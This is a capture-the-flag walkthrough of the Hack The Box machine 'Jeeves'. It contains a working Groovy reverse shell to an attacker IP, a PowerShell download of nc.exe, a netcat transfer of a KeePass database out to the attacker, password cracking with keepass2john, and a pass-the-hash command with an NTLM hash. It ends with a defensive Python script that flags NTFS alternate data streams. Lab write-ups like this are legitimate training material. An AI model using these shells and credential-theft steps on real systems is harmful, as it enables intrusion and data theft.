Overall Summary
Jeeves is a Windows machine from Hack The Box that can be exploited through Jenkins by running a Groovy reverse shell. Privilege escalation requires finding a KeePass (.kdbx) database and using John the Ripper to recover the password that opens it. The database contains some usernames and passwords, but to gain administrative privileges we will need to use a technique called “Pass the hash”. Overall, the machine is easy, but it does require some research to understand how to proceed.
Scanning and Enumeration
Exploitation
Jenkins on this box lets us execute Groovy scripts, which we can use to get a reverse shell. For the reverse shell I’ll use a script from GitHub that can be found here:
https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
and change the host and port to my IP address and listener port. This is the script I’ll be using:
String host="10.10.14.21";
int port=443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();
s.close();
Post-Exploitation
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.21/nc.exe','nc.exe')"
nc -lnvp 4321 > CEH.kdbx
nc.exe -nv 10.10.14.21 4321 < C:\Users\kohsuke\Documents\CEH.kdbx
Once I had downloaded the file to my attacking machine I had to install keepass2, because version 2 is the one that introduced the kdbx format; I found this out by reading the following link:
https://fileinfo.com/extension/kdbx
We can simply install keepass2 by running the following commands in Kali Linux:
sudo apt-get update
sudo apt-get install keepass2
keepass2john CEH.kdbx > tocrack
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
The Trick About The Flag
dir /r
We can now see the root.txt file, but we still need to read it to get the flag. To read the flag we can simply use the “more” command, as I learned from this article:
http://www.flexhex.com/docs/articles/alternate-streams.phtml
This is the command that can be used to read the flag:
more < hm.txt:root.txt
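The flag is hidden in an NTFS alternate data stream: dir /r lists every stream a file carries as file:stream:$DATA on its own line, without a timestamp, and the redirection form of more is used because a stream path is opened as input rather than as a file name argument. The same trick is used outside CTFs to stash payloads where a normal directory listing never shows them, so a triage script that parses dir /r output for unexpected streams is worth having. The following added example (not part of the original writeup) does that over a constructed dir /r listing; the Zone.Identifier stream (the Mark-of-the-Web that browsers attach to downloads) is treated as benign so only genuinely odd streams such as hm.txt:root.txt are reported. The listing and its file names are constructed for the demo, not captured from the box.

```python
import re

# Constructed sample of `dir /r` output (not captured from the box). Stream lines carry only a
# size and the name file:stream:$DATA; regular entries start with a date.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/08/2017  10:05 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM             1,024 notes.txt
                                   512 notes.txt:Zone.Identifier:$DATA
               2 File(s)          1,060 bytes
"""

# size, then "<file>:<stream>:$DATA"; NTFS forbids ':' in file and stream names, so the split is safe.
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

# Streams Windows itself writes and that are not worth an alert on their own.
BENIGN_STREAMS = ("Zone.Identifier",)


def find_alternate_streams(dir_output: str) -> dict:
    """Map each file name to a list of (stream name, size in bytes) found in `dir /r` output."""
    streams = {}
    for line in dir_output.splitlines():
        m = STREAM_LINE.match(line)
        if not m:
            continue
        size = int(m.group(1).replace(",", ""))
        streams.setdefault(m.group(2), []).append((m.group(3), size))
    return streams


def suspicious_streams(dir_output: str, benign=BENIGN_STREAMS) -> dict:
    """Same map, with the benign streams removed; files with nothing left are dropped."""
    result = {}
    for name, found in find_alternate_streams(dir_output).items():
        odd = [(stream, size) for stream, size in found if stream not in benign]
        if odd:
            result[name] = odd
    return result


def read_command(file_name: str, stream: str) -> str:
    """The cmd.exe one-liner the writeup uses to print a stream, for the streams the triage flagged."""
    return f"more < {file_name}:{stream}"


if __name__ == "__main__":
    for file_name, found in suspicious_streams(SAMPLE_DIR_R).items():
        for stream, size in found:
            print(f"{file_name}:{stream} ({size} bytes) -> {read_command(file_name, stream)}")
```

On a live host the same parser can be fed the output of `dir /r /s C:\` redirected to a file; on PowerShell-only boxes `Get-Item -Path <file> -Stream *` gives the same information with less parsing.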